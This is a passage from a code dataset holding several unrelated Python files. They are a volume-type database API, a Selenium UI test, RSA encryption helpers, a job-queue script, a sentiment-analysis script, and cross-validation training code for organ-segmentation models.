read_deleted=\"no\").\\\n filter_by(project_id=project_id).\\\n all()\n\n for quota_ref in quotas:\n quota_ref.delete(session=context.session)\n\n if only_quotas:\n return\n\n quota_usages = model_query(context, models.QuotaUsages,\n session=context.session,\n read_deleted=\"no\").\\\n filter_by(project_id=project_id).\\\n all()\n\n for quota_usage_ref in quota_usages:\n quota_usage_ref.delete(session=context.session)\n\n reservations = model_query(context, models.Reservation,\n session=context.session,\n read_deleted=\"no\").\\\n filter_by(project_id=project_id).\\\n all()\n\n for reservation_ref in reservations:\n reservation_ref.delete(session=context.session)\n\n\n@require_admin_context\n@_retry_on_deadlock\ndef reservation_expire(context):\n with context.session.begin():\n current_time = timeutils.utcnow()\n results = model_query(context, models.Reservation,\n session=context.session,\n read_deleted=\"no\").\\\n filter(models.Reservation.expire < current_time).\\\n all()\n\n if results:\n for reservation in results:\n if reservation.delta >= 0:\n reservation.usage.reserved -= reservation.delta\n reservation.usage.save(session=context.session)\n\n reservation.delete(session=context.session)\n\n\ndef _dict_with_extra_specs_if_authorized(context, inst_type_query):\n \"\"\"Convert type query result to dict with extra_spec and rate_limit.\n\n Takes a volume type query returned by sqlalchemy and returns it\n as a dictionary, converting the extra_specs entry from a list\n of dicts.\n\n NOTE:\n the contents of extra-specs are admin readable only.\n If the context passed in for this request is not about admin,\n we will return an empty extra-specs dict rather than\n providing extra-specs details.\n\n :param context: The request context, for access checks.\n :param inst_type_query: list of extra-specs.\n :returns dictionary of extra-specs.\n\n Example of response of admin context:\n\n 'extra_specs' : [{'key': 'k1', 'value': 'v1', ...}, ...]\n to a single dict:\n 'extra_specs' : {'k1': 'v1'}\n\n \"\"\"\n\n inst_type_dict = dict(inst_type_query)\n if not context.is_admin:\n del (inst_type_dict['extra_specs'])\n else:\n extra_specs = {x['key']: x['value']\n for x in inst_type_query['extra_specs']}\n inst_type_dict['extra_specs'] = extra_specs\n return inst_type_dict\n\n\n@require_context\ndef _volume_type_get_by_name(context, name, session=None):\n result = model_query(context, models.VolumeTypes, session=session). \\\n options(joinedload('extra_specs')). \\\n filter_by(name=name). \\\n first()\n\n if not result:\n raise exceptions.VolumeTypeNotFoundByName(volume_type_name=name)\n\n return _dict_with_extra_specs_if_authorized(context, result)\n\n\n@require_context\ndef volume_type_get_by_name(context, name, session=None):\n \"\"\"Return a dict describing specific volume_type.\n\n :param context: The request context, for access checks.\n :param name: The name of volume type to be found.\n :returns Volume type.\n \"\"\"\n return _volume_type_get_by_name(context, name, session)\n\n\ndef _volume_type_get_query(context, session=None, read_deleted='no'):\n query = model_query(context, models.VolumeTypes,\n session=session,\n read_deleted=read_deleted). \\\n options(joinedload('extra_specs'))\n\n if not context.is_admin:\n is_public = True\n the_filter = [models.VolumeTypes.is_public == is_public]\n query.filter(or_(*the_filter))\n\n return query\n\n\ndef _volume_type_get_db_object(context, id, session=None, inactive=False):\n read_deleted = \"yes\" if inactive else \"no\"\n result = _volume_type_get_query(\n context, session, read_deleted). \\\n filter_by(id=id). \\\n first()\n return result\n\n\n@require_context\ndef _volume_type_get(context, id, session=None, inactive=False):\n result = _volume_type_get_db_object(context, id, session, inactive)\n\n if not result:\n raise exceptions.VolumeTypeNotFound(volume_type_id=id)\n\n vtype = _dict_with_extra_specs_if_authorized(context, result)\n\n return vtype\n\n\n@require_context\ndef volume_type_get(context, id, inactive=False):\n \"\"\"Return a dict describing specific volume_type.\n\n :param context: The request context, for access checks.\n :param id: The id of volume type to be found.\n :returns Volume type.\n \"\"\"\n\n return _volume_type_get(context, id,\n session=None,\n inactive=inactive)\n\n\n@require_context\ndef volume_type_delete(context, id, session):\n \"\"\"delete a volume_type by id.\n\n :param context: The request context, for access checks.\n :param id: The id of volume type to be deleted.\n \"\"\"\n model_query(context, models.VolumeTypes, session=session, read_deleted=\"no\").\\\n filter_by(id=id). \\\n update({'deleted': True,\n 'deleted_at': timeutils.utcnow(),\n 'updated_at': literal_column('updated_at')})\n\n model_query(context, models.VolumeTypeExtraSpecs, session=session, read_deleted=\"no\"). \\\n filter_by(volume_type_id=id). \\\n update({'deleted': True,\n 'deleted_at': timeutils.utcnow(),\n 'updated_at': literal_column('updated_at')})\n\n\ndef is_valid_model_filters(model, filters):\n \"\"\"Return True if filter values exist on the model\n\n :param model: a Cinder model\n :param filters: dictionary of filters\n \"\"\"\n for key in filters.keys():\n if not hasattr(model, key):\n return False\n return True\n\n\ndef _process_volume_types_filters(query, filters):\n context = filters.pop('context', None)\n\n if filters.get('is_public'):\n the_filter = [models.VolumeTypes.is_public == filters['is_public']]\n\n if filters['is_public'] and context.project_id is not None:\n projects_attr = getattr(models.VolumeTypes, 'projects')\n the_filter.append(\n [projects_attr.any(project_id=context.project_id,\n deleted=0)])\n\n if len(the_filter) > 1:\n query = query.filter(or_(*the_filter))\n else:\n query = query.filter(the_filter[0])\n\n if 'is_public' in filters:\n del filters['is_public']\n\n if filters:\n # Ensure that filters' keys exist on the model\n if not is_valid_model_filters(models.VolumeTypes, filters):\n return\n\n if filters.get('extra_specs') is not None:\n the_filter = []\n searchdict = filters.get('extra_specs')\n extra_specs = getattr(models.VolumeTypes, 'extra_specs')\n for k, v in searchdict.items():\n the_filter.append([extra_specs.any(key=k, value=v,\n deleted=False)])\n\n if len(the_filter) > 1:\n query = query.filter(and_(*the_filter))\n else:\n query = query.filter(the_filter[0])\n del filters['extra_specs']\n query = query.filter_by(**filters)\n return query\n\n\n@require_context\ndef volume_type_get_all(context, inactive=False, filters=None,\n list_result=False):\n \"\"\"Returns a dict describing all volume_types with name as key.\n\n :param context: context to query under\n :param inactive: Pass true as argument if you want deleted volume types\n returned also.\n :param filters: dictionary of filters; values that are in lists, tuples,\n or sets cause an 'IN' operation, while exact matching\n is used for other values, see _process_volume_type_filters\n function for more information\n :param list_result: For compatibility, if list_result = True, return\n a list instead of dict.\n :returns: list/dict of matching volume types\n \"\"\"\n read_deleted = 'yes' if inactive else 'no'\n session = core.get_session()\n with session.begin():\n filters = filters or {}\n filters['context'] = context\n # Generate the query\n query = _volume_type_get_query(context, session=session,\n read_deleted=read_deleted)\n query = _process_volume_types_filters(query, filters)\n\n # No volume types would match, return empty dict or list\n if query is None:\n if list_result:\n return []\n return {}\n\n rows = query.all()\n\n if list_result:\n result = [_dict_with_extra_specs_if_authorized(context, row)\n for row in rows]\n return result\n result = {row['name']: _dict_with_extra_specs_if_authorized(context,\n row)\n for row in rows}\n return result\n\n\n@require_context\ndef _volume_type_ref_get(context, id, session=None, inactive=False):\n read_deleted = \"yes\" if inactive else \"no\"\n result = model_query(context,\n models.VolumeTypes,\n session=session,\n read_deleted=read_deleted).\\\n options(joinedload('extra_specs')).\\\n filter_by(id=id).\\\n first()\n\n if not result:\n raise exceptions.VolumeTypeNotFound(volume_type_id=id)\n\n return result\n\n\n@handle_db_data_error\n@require_admin_context\ndef volume_type_update(context, volume_type_id, values):\n \"\"\"Update volume type by volume_type_id.\n\n :param volume_type_id: id of volume type to be updated\n :param values: dictionary of values to be updated\n :returns: updated volume type\n \"\"\"\n session = core.get_session()\n with session.begin():\n try:\n # Check it exists\n volume_type_ref = _volume_type_ref_get(context,\n volume_type_id,\n session)\n if not volume_type_ref:\n raise exceptions.VolumeTypeNotFound(type_id=volume_type_id)\n\n # No description change\n if values['description'] is None:\n del values['description']\n\n # No is_public change\n if values['is_public'] is None:\n del values['is_public']\n\n # No name change\n if values['name'] is None:\n del values['name']\n else:\n # Volume type name is unique. If change to a name that\n # belongs to a different volume_type , it should be\n # prevented.\n check_vol_type = None\n try:\n check_vol_type = \\\n volume_type_get_by_name(context,\n values['name'],\n session=session)\n except exceptions.VolumeTypeNotFoundByName:\n pass\n else:\n if check_vol_type.get('id') != volume_type_id:\n raise exceptions.VolumeTypeExists(id=values['name'])\n\n volume_type_ref.update(values)\n volume_type_ref.save(session=session)\n except Exception:\n raise exceptions.VolumeTypeUpdateFailed(id=volume_type_id)\n\n return _dict_with_extra_specs_if_authorized(context, volume_type_ref)\n\n\n@require_context\ndef volume_type_project_query(context, session=None, inactive=False,\n filters=None):\n \"\"\"Get a query of volume type project.\n\n :param context: context to query under\n :param inactive: Pass true as argument if you want deleted\n volume type projects returned also.\n :param filters: dictionary of filters.\n \"\"\"\n read_deleted = \"yes\" if inactive else \"no\"\n filters = filters or {}\n return model_query(context, models.VolumeTypeProjects, session=session,\n read_deleted=read_deleted).filter_by(**filters)\n","repo_name":"lilingxing20/newcloudo2o","sub_path":"newcloudo2o/db/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":41948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5847915722","text":"from selenium import webdriver\nfrom webdriver_manager.firefox import GeckoDriverManager\nimport time\n\nurl = \"https://the-internet.herokuapp.com/\"\n\n\ndef test_add_delete_button(url):\n driver = webdriver.Firefox(executable_path=GeckoDriverManager().install())\n driver.implicitly_wait(6)\n # search for link with Add/Remove Elements\n driver.find_element_by_xpath('//div[@id=\"content\"]/ul/li[2]/a').click()\n time.sleep(3)\n\n add_button = driver.find_element_by_css_selector('#content > div > button')\n\n assert add_button\n print(\"Add buton is presented on page\")\n add_button.click()\n\n # search for delete button\n del_button = driver.find_element_by_css_selector('#elements > button')\n assert del_button\n print(\"Delete button is presented on page\")\n del_button.click()\n\n driver.quit()\n print(\"Test succeed\")\n\n\nif __name__ == '__main__':\n test_add_delete_button(url)\n","repo_name":"JackNikolson/selenium_examples","sub_path":"tests/add_remove_elements.py","file_name":"add_remove_elements.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"86724849477","text":"from Crypto import Random\nfrom Crypto.Hash import SHA\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Cipher import PKCS1_v1_5 as Cipher_pkcs1_v1_5\nfrom Crypto.Signature import PKCS1_v1_5 as Signature_pkcs1_v1_5\nimport base64\n\n\ndef encrypt(msg, pub):\n rsakey = RSA.importKey(pub)\n cipher = Cipher_pkcs1_v1_5.new(rsakey)\n ciphertext = cipher.encrypt(msg.encode('utf8'))\n return base64.b64encode(ciphertext).decode('utf8')\n\n\ndef decrypt(msg, pri):\n rsakey = RSA.importKey(pri)\n cipher = Cipher_pkcs1_v1_5.new(rsakey)\n plaintext = cipher.decrypt(base64.b64decode(msg), Random.new().read)\n return plaintext.decode('utf8')\n\n\ndef sign(msg, pri):\n rsakey = RSA.importKey(pri)\n signer = Signature_pkcs1_v1_5.new(rsakey)\n digest = SHA.new()\n digest.update(msg.encode('utf8'))\n signature = signer.sign(digest)\n return base64.b64encode(signature).decode('utf8')\n\n\ndef verify_signature(msg, signature, pub):\n rsakey = RSA.importKey(pub)\n signer = Signature_pkcs1_v1_5.new(rsakey)\n digest = SHA.new()\n digest.update(msg.encode('utf8'))\n return signer.verify(digest, base64.b64decode(signature))\nimport crypt\n\nwith open('../keys/public_key_s.pem', 'r') as f:\n pub = f.read()\n\nwith open('../keys/private_key_s.pem', 'r') as f:\n pri = f.read()\n\n\nmsg = 'hello world'\nprint('origin msg: %s\\n' % msg)\n\nciphertext = crypt.encrypt(msg, pub)\nprint('get ciphertext: %s\\n' % ciphertext)\n\nplaintext = crypt.decrypt(ciphertext, pri)\nprint('get plaintext: %s\\n' % plaintext)\n\nsignature = crypt.sign(msg, pri)\nprint('get signature: %s\\n' % signature)\n\nverify = crypt.verify_signature(plaintext, signature, pub)\nprint('get verify result: %s\\n' % verify)\n","repo_name":"tw-bc-group/decentralized-smart-lock","sub_path":"LockController/crypt.py","file_name":"crypt.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"34448122056","text":"import json\nimport _pickle as pickle\nfrom model import TBSentiment\nimport argparse\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"reddit data go here please\")\n parser.add_argument('--data', type=str, nargs='?')\n parser.add_argument('--model', type=str, nargs='?')\n parser.add_argument('--save', type=str, nargs='?')\n args = parser.parse_args()\n\n if args.model is not None:\n print(\"loading model\")\n loader = open(args.model, 'rb')\n model_obj = pickle.load(loader)\n\n if args.data is not None:\n overall_data = {}\n\n with open(args.data, 'r') as file:\n data = json.load(file)\n print('loaded json file')\n for k, _ in data.items():\n print(k)\n overall_data[k] = {}\n \n neg_c = []\n pos_c = []\n sum_conf = 0\n\n # Classify and store comments in list\n for comment in data[k]:\n pol, con = model_obj.classify(comment)\n\n sum_conf += con\n \n if pol == 'pos':\n pos_c.append((pol, con, comment))\n elif pol == 'neg':\n neg_c.append((pol, con, comment))\n \n avg_conf = sum_conf / (len(pos_c) + len(neg_c))\n\n # Sort list by confidence\n pos_c = sorted(pos_c, key=lambda x: x[1])\n neg_c = sorted(neg_c, key=lambda x: x[1])\n\n sent_score = len(pos_c)/(len(pos_c) + len(neg_c))\n\n overall_pol = ''\n if 0.80 <= sent_score <= 1:\n overall_pol = 'very positive'\n elif 0.60 <= sent_score < 0.80:\n overall_pol = 'positive'\n elif 0.40 < sent_score < 0.60:\n overall_pol = 'neutral'\n elif 0.20 < sent_score <= 0.40:\n overall_pol = 'negative'\n else:\n overall_pol = 'very negative'\n\n print('overall sentiment:', overall_pol, sent_score)\n print(\"average confidence:\", avg_conf)\n\n #print('most positive comments:', top_pos)\n #print('most negative comments:', top_neg)\n\n overall_data[k]['sentiment'] = overall_pol\n overall_data[k]['confidence'] = avg_conf\n overall_data[k]['top_pos'] = pos_c[:10]\n overall_data[k]['top_neg'] = neg_c[:10]\n\n with open(args.save, 'w') as file:\n json.dump(overall_data, file)\n else:\n print('needs a model')\n","repo_name":"seanerice/college-sentiment","sub_path":"models/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36115187688","text":"from rq import Queue\nfrom redis import Redis\nimport pandas as pd\nimport click\n\nfrom pacstools.job import program_args\n\n\ndef fill(file):\n redis_con = Redis()\n q = Queue(connection=redis_con)\n df = pd.read_csv(file)\n df = df[20:101]\n for row in df.itertuples():\n q.enqueue(\n program_args,\n timeout='10m',\n patient_id=row.PatientID,\n accession_number=str(row.AccessionNumber),\n study_instance_uid=row.StudyInstanceUID,\n output_dir='/data/projects/federau')\n\n\n@click.command()\n@click.argument('file')\ndef run(file):\n fill(file)\n\nif __name__ == '__main__':\n run()","repo_name":"joshy/pacstools","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1130788119","text":"from audioop import cross\nimport matplotlib.pyplot as plt\nimport os\nimport shutil\nimport pathlib\nimport glob\nimport pickle\nimport numpy as np\nimport random\nimport math\nimport torch \nimport torch.nn as nn\nimport torchvision\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.utils.data import random_split, dataset \nfrom shapely.geometry import Point\nimport torch.nn.functional as F\nimport DicomParsing\nimport Model\nimport Test\nfrom Dataset import CTDataset\nimport albumentations as A \nimport subprocess\nfrom PostProcessing import ThresholdRescaler\nimport re\nimport statistics\nimport Predict\n\ndef Check_Cross_Validation_Stats(organ, epochs=20, path=None, model_type='MultiResUNet', fold=5):\n \"\"\"\n Calculates the statistics from the previous cross validation performed on the specified organ with the specified model type and fold number.\n organ (str): the organ to check statistics on \n path (str): path of the main directory for organogenesis (default None if currently in)\n model_type (str): type of network architecture used for training\n fold (int): fold of k-fold cross validation used\n \"\"\"\n #1. Divide the data into the k groups of train/validation data\n\n if path == None:\n path = os.getcwd()\n\n patients_folder = os.path.join(path, \"Patient_Files\")\n \n current_fold=0\n cross_val_idx=None \n while current_fold < fold:\n current_fold +=1 \n if organ == \"Tubarial\":\n val_list =DicomParsing.GetTrainingData_Tubarial(patients_folder, path, cross_val=True, fold=[fold, current_fold])\n else: \n val_list = DicomParsing.GetTrainingData(patients_folder, organ, path, cross_val=True, fold=[fold, current_fold]) #go through all the dicom files and create the imagesval_list = DicomParsing.GetTrainingData(patients_folder, organ, path, cross_val=True, fold=[fold, current_fold]) #go through all the dicom files and create the images\n # #val_list = [\"CT_140453\", \"CT_142932\", \"CT_143029\", \"CT_143516\"] \n #val_list = [\"CT_140453\"]\n #val_list = [\"CT_163329\"]\n #val_list = [\"CT_151203\"]\n\n if model_type.lower() == \"unet\":\n model = Model.UNet()\n elif model_type.lower() == \"multiresunet\": \n model = Model.MultiResUNet()\n\n epoch_val=epochs-1 \n loaded=False \n while epoch_val > 0 and loaded == False:\n\n try:\n model_path = os.path.join(path, \"Models\", organ, \"CV_Models\", str(\"Model_\" + model_type.lower() + \"_\" + organ.replace(\" \", \"\") + \"_\" + \"CV\" + str(current_fold) + \"_\" + str(epoch_val) + \".pt\")) \n model.load_state_dict(torch.load(model_path))\n loaded = True\n except:\n epoch_val -= 1 \n torch.save(model.state_dict(), os.path.join(path, \"Models\", organ, \"Model_\" + model_type.lower() + \"_\" + organ.replace(\" \", \"\") + \".pt\"))\n\n \n\n intercept = ThresholdRescaler(organ, model_type, path=None)\n #save intercept for cross val\n saveFileName = str(current_fold) + model_type.lower() + \"_\" + organ.replace(\" \", \"\") + \"_rescale_intercept.txt\" \n with open(os.path.join(path, \"Models\", organ, \"Scaling_Factors\", saveFileName ), 'wb') as pick:\n pickle.dump(intercept, pick) \n\n thres = Test.BestThreshold(organ, path, model_type, val_list, intercept=intercept)\n with(open(os.path.join(path, \"Models\", organ, \"Scaling_Factors\", str(current_fold) + model_type.lower() + \"_\" + organ.replace(\" \", \"\") + \"_Thres.txt\"),'wb')) as fp:\n pickle.dump(thres, fp)\n\n \n eval_data = Test.GetEvalData(organ,path,thres, model_type, intercept, val_list)\n f_score = eval_data[\"F Score\"] \n haus = eval_data[\"Hausdorff\"]\n jaccard = eval_data[\"Jaccard Score\"]\n eval_data_path = os.path.join(path, \"Models\", organ, \"Statistics\",\"Eval_Data\", \"Eval_Data_CV\" + str(current_fold) + \".txt\")\n with open(eval_data_path, \"wb\") as fp:\n pickle.dump(eval_data, fp)\n #save the list of validation files used in the current fold\n with open(os.path.join(path, \"Models\", organ, \"CV_Models\", str(current_fold) + \"_val_list\"), \"wb\") as fp:\n pickle.dump(val_list, fp) \n\n print(f'CV{current_fold}: F-Score: {f_score} ; H: {haus} ; J: {jaccard}') \n \n #load all the f scores and hausdorff distances and take average\n eval_path = os.path.join(path, \"Models\", organ, \"Statistics\",\"Eval_Data\")\n\n eval_files = os.listdir(eval_path)\n f_scores = [] #dice similarity coefficient \n hauses = [] #95th percentile Hausdorff\n jacs = [] #jaccard index\n for f in eval_files:\n with open(os.path.join(eval_path, f), \"rb\") as fp:\n score = pickle.load(fp)\n f_scores.append(score[\"F Score\"])\n jacs.append(score[\"Jaccard Score\"])\n hauses.append(score[\"Hausdorff\"])\n \n \n avg_f = statistics.mean(f_scores)\n avg_h = statistics.mean(hauses)\n avg_j = statistics.mean(jacs)\n std_f = statistics.stdev(f_scores)\n std_h = statistics.stdev(hauses)\n std_j = statistics.stdev(jacs)\n\n eval_stats = {}\n eval_stats[\"F_Score\"] = [avg_f, std_f, f_scores]\n eval_stats[\"Hausdorff\"] = [avg_h, std_h, hauses]\n eval_stats[\"Jaccard\"] = [avg_j, std_j, jacs]\n eval_path = os.path.join(path, \"Models\", organ, \"Statistics\", \"Eval_Stats\" + \".txt\")\n\n with open(eval_path, \"wb\") as fp:\n pickle.dump(eval_stats, fp)\n \n\n print(f\"CV Results: \\n F-Score: {avg_f} += {std_f} \\n 95 percentile Hausdorff distance: {avg_h} += {std_h}\\n Jaccard Index: {avg_j} +- += {std_j}\") \n\ndef CrossValidate(organ, epochs=15, lr=1e-3, path=None, model_type='MultiResUNet', fold=5, data_augmentation=True, continue_previous=False):\n \"\"\"\n Performs a k-fold cross validation of the selected model type and organ.\n folds are created by linear iteration through N / k groups of patients, \n with one group comprising the validation set in each. \n Args:\n organ (str): the organ to train the model on \n epochs (int): number of epochs to train each model with in each fold\n lr (float): learning rate to use during optimization\n modelType (str): type of neural network architecture to use for training\n dataAugmentation (bool): True if augmentation transforms are to be applied during training\n\n \"\"\"\n \n\n\n if path == None:\n path = os.getcwd()\n\n patients_folder = os.path.join(path, \"Patient_Files\") \n\n current_fold = 0\n first_iter=True\n while current_fold < fold:\n current_fold +=1\n # if current_fold == 2:\n # continue\n if continue_previous and first_iter: \n #if carrying off on previously started cv, need to see which fold currently on\n cv_path = os.path.join(path, \"Models\", organ, \"CV_Models\")\n num_files = len(os.listdir(cv_path))\n current_fold = int(num_files / epochs) + 1\n \n print(f\"continuing cross validation on fold {current_fold} and epoch {num_files % epochs}\") \n\n print(f\"Beginning fold # {current_fold}\")\n if organ == \"Tubarial\":\n val_list =DicomParsing.GetTrainingData_Tubarial(patients_folder, path, cross_val=True, fold=[fold, current_fold])\n else: \n val_list = DicomParsing.GetTrainingData(patients_folder, organ, path, cross_val=True, fold=[fold, current_fold]) #go through all the dicom files and create the images\n\n\n if continue_previous and first_iter:\n Train(organ,epochs,lr, path, modelType=model_type, processData=False, dataAugmentation=data_augmentation, cross_val_idx=current_fold, loadModel=True)\n first_iter=False #ensure this only happens once\n else:\n Train(organ,epochs,lr, path, modelType=model_type, processData=False, dataAugmentation=data_augmentation, cross_val_idx=current_fold, loadModel=False)\n epoch_val=epochs-1 \n #save the model to the main folder so its there to compute intercept \n model_path = os.path.join(path, \"Models\", organ, \"CV_Models\", str(\"Model_\" + model_type.lower() + \"_\" + organ.replace(\" \", \"\") + \"_\" + \"CV\" + str(current_fold) + \"_\" + str(epoch_val) + \".pt\")) \n if model_type.lower() == \"unet\":\n model = Model.UNet()\n elif model_type.lower() == \"multiresunet\": \n model = Model.MultiResUNet()\n model.load_state_dict(torch.load(model_path))\n torch.save(model.state_dict(), os.path.join(path, \"Models\", organ, \"Model_\" + model_type.lower() + \"_\" + organ.replace(\" \", \"\") + \".pt\"))\n\n intercept = ThresholdRescaler(organ, model_type, path=None)\n #save intercept for cross val\n saveFileName = str(current_fold) + model_type.lower() + \"_\" + organ.replace(\" \", \"\") + \"_rescale_intercept.txt\" \n with open(os.path.join(path, \"Models/\", organ, \"Scaling_Factors\", saveFileName ), 'wb') as pick:\n pickle.dump(intercept, pick) \n thres = Test.BestThreshold(organ, path, model_type, val_list, intercept=intercept)\n with(open(os.path.join(path, \"Models\", organ, \"Scaling_Factors\", str(current_fold) + model_type.lower() + \"_\" + organ.replace(\" \", \"\") + \"_Thres.txt\"),'wb')) as fp:\n pickle.dump(thres, fp)\n \n #Predict.GetMultipleContours([organ], val_list ,path = None, thresholdList = [thres]*len(val_list), modelTypeList = [\"multiresunet\"]*len(val_list), withReal=False, tryLoad=False, save=True)\n eval_data = Test.GetEvalData(organ,path,thres, model_type, val_list)\n f_score = eval_data[\"F Score\"] \n haus = eval_data[\"Hausdorff\"]\n jaccard = eval_data[\"Jaccard Score\"]\n eval_data_path = os.path.join(path, \"Models\", organ, \"Statistics\",\"Eval_Data\", \"Eval_Data_CV\" + str(current_fold) + \".txt\")\n with open(eval_data_path, \"wb\") as fp:\n pickle.dump(eval_data, fp)\n\n print(f'CV{current_fold}: F-Score: {f_score} ; H: {haus} ; J: {jaccard}') \n \n #load all the f scores and hausdorff distances and take average\n eval_path = os.path.join(path, \"Models\", organ, \"Statistics\",\"Eval_Data\")\n\n eval_files = os.listdir(eval_path)\n f_scores = [] #dice similarity coefficient \n hauses = [] #95th percentile Hausdorff\n jacs = [] #jaccard index\n for f in eval_files:\n with open(os.path.join(eval_path, f), \"rb\") as fp:\n score = pickle.load(fp)\n f_scores.append(score[\"F Score\"])\n jacs.append(score[\"Jaccard Score\"])\n hauses.append(score[\"Hausdorff\"])\n \n \n avg_f = statistics.mean(f_scores)\n avg_h = statistics.mean(hauses)\n avg_j = statistics.mean(jacs)\n std_f = statistics.stdev(f_scores)\n std_h = statistics.stdev(hauses)\n std_j = statistics.stdev(jacs)\n eval_stats = {}\n eval_stats[\"F_Score\"] = [avg_f, std_f, f_scores]\n eval_stats[\"Hausdorff\"] = [avg_h, std_h, hauses]\n eval_stats[\"Jaccard\"] = [avg_j, std_j, jacs]\n eval_path = os.path.join(path, \"Models\", organ, \"Statistics\", \"Eval_Stats\" + \".txt\")\n\n with open(eval_path, \"wb\") as fp:\n pickle.dump(eval_stats, fp)\n \n\n print(f\"CV Results: \\n F-Score: {avg_f} +- {std_f}\\n 95 percentile Hausdorff distance: {avg_h} +-{std_h}\\n Jaccard Index: {avg_j}+-{std_j}\") \n\n\n\ndef Train(organ,numEpochs,lr, path, modelType, processData=True, loadModel=False, sortData=False, preSorted=False, dataAugmentation=True, cross_val_idx=None):\n \"\"\"Trains a model for predicting contours on a given organ. Saves the model \n and loss history after each epoch. Stops training after a given number of\n epochs or when the validation loss has decreased by less than 0.001 for \n 4 consecutive epochs. \n\n Args:\n organ (str): the organ to train the model on \n numEpochs (int, str): the number of epochs to train for\n lr (float, str): the learning rate to train with\n path (str): the path to the directory containing organogenesis folders \n (Models, Processed_Data, etc.)\n processData (bool): True to process the data into training/testing/\n validation folders, False if they are already processed\n loadModel (bool): True to load a model and continue training, \n False to train a new model\n modelType (str): the type of model to be used in training \n sortData (bool): True to visually inspect contours for quality \n assurance, False to process data without looking at contours\n preSorted(bool): True to use presorted good/bad/no contour lists, \n False to display contours for each patient and sort manually\n dataAugmentation (bool): True to turn on data augmentation for \n training, False to use non-augmented CT images.\n cross_val_idx (optional int): in cases where models are trained in a cross validation loop, saved weights need to include the index of the current CV iteration \n \"\"\"\n #First extract patient training data and process it for each, saving it into Processed_Data folder\n torch.cuda.empty_cache()\n dataPath = 'Processed_Data/' + organ + \"/\"\n if path==None: #if a path to data was not supplied, assume that patient data has been placed in the Patient_Files folder in the current directory. \n path = pathlib.Path(__file__).parent.absolute() \n patientsPath = 'Patient_Files/'\n filesFolder = os.path.join(pathlib.Path(__file__).parent.absolute(), patientsPath)\n dataFolder = os.path.join(pathlib.Path(__file__).parent.absolute(), dataPath) #this gives the absolute folder reference of the datapath variable defined above\n if processData:\n DicomParsing.GetTrainingData(filesFolder, organ,path, sortData, preSorted) #go through all the dicom files and create the images\n print(\"Data Processed\")\n \n else: \n folderScriptPath = os.path.join(pathlib.Path(__file__).parent.absolute(), \"FolderSetup.sh\")\n filesFolder = path\n modelPath = os.path.join(pathlib.Path(__file__).parent.absolute(), \"Models\")\n dataFolder = os.path.join(path, dataPath) \n #Now if a path has been specified, then the Model folder must be in this path as well. \n #check for the model path: \n #Furthermore, if processData is false, then there must exist the Processed_Data folder\n if not processData:\n dataPath = os.path.join(path, \"Processed_Data\")\n if not os.path.isdir(dataPath): #If the processedData folder doesnt exist, then itll have to be made and data processed.\n processData=True\n preSorted=False \n dataErrorMessage = \"Processed_Data directory was not found in the provided path. Data will have to be processed.\\n \\\n press enter to continue\"\n while True: #wait for user input \n try:\n input = input(dataErrorMessage)\n if input == \"\":\n break\n except KeyboardInterrupt:\n quit() \n except: pass \n #Now run the FolderSetup.sh Script in the given directory to make sure all directories are present\n shutil.copy('FolderSetup.sh', path)\n os.chdir(path)\n subprocess.call(['sh', './FolderSetup.sh']) \n DicomParsing.GetTrainingData(filesFolder, organ, preSorted, path) #go through all the dicom files and create the images\n print(\"Data Processed\")\n else:\n shutil.copy(folderScriptPath, path)\n os.chdir(path) \n DicomParsing.GetTrainingData(filesFolder, organ, path, sortData, preSorted) #go through all the dicom files and create the images\n subprocess.call(['sh', './FolderSetup.sh']) \n print(\"Data Processed\")\n\n #See if cuda is available, and set the device as either cuda or cpu if is isn't available\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n print(\"\\nDevice being used for training: \" + device.type)\n #Now define or load the model and optimizer: \n epochLossHistory = []\n trainLossHistory = []\n if modelType.lower() == \"unet\":\n model = Model.UNet()\n elif modelType.lower() == \"multiresunet\": \n model = Model.MultiResUNet()\n if loadModel == True:\n #load the model state dict for the last epoch:\n if type(cross_val_idx) == int:\n models_path = os.path.join(path, \"Models\", organ, \"CV_Models\")\n cv_model_files = sorted(os.listdir(models_path))\n cv_model_files = list(filter(lambda val: f\"CV{cross_val_idx}\" in val, cv_model_files))\n if len(cv_model_files) > 0:\n nums = [int(i) for i in cv_model_files[-1] if i.isdigit()]\n current_epoch = int(str(nums[-2]) + str(nums[-1])) + 1\n if current_epoch != numEpochs:\n model.load_state_dict(torch.load(os.path.join(models_path, cv_model_files[-1]))) \n #get current epoch: \n print(f\"loaded model weights for {cv_model_files[-1]}. Continuing training on Epoch {current_epoch}\")\n else: \n return #if already fully trained on this fold \n else:\n current_epoch = 0 \n\n # try:\n # model.load_state_dict(torch.load(os.path.join(models_path, \"Model_multiresunet_\" + organ.replace(\" \", \"\") + \"_CV\" + str(cross_val_idx) + \"_\" + current_epoch + \".pt\" ))) \n # print(\"loaded cv model\")\n # except:\n # print(f\"Could not find a pre-existing model to load for CV {cross_val_idx} and epoch {current_epoch}...\") \n else: \n models_path = os.path.join(path, \"Models\", organ, \"Epoch_Models\")\n epoch_model_files = sorted(os.listdir(models_path))\n model.load_state_dict(torch.load(os.path.join(models_path, epoch_model_files[-1]))) \n nums = [int(i) for i in epoch_model_files[-1].split() if i.isdigit()]\n current_epoch = int(str(nums[-2]) + str(nums[-1]))+1\n print(f\"loaded model weights for {epoch_model_files[-1]}. Continuing training on Epoch {current_epoch}\")\n try: #try to load lists which are keeping track of the loss over time\n \n if type(cross_val_idx) == int:\n epochLossHistory = pickle.load(open(os.path.join(path, \"Models\", organ, \"CV\" + str(cross_val_idx) + \"_\" + modelType.lower() + \"_\" + \"epochLossHistory\" + 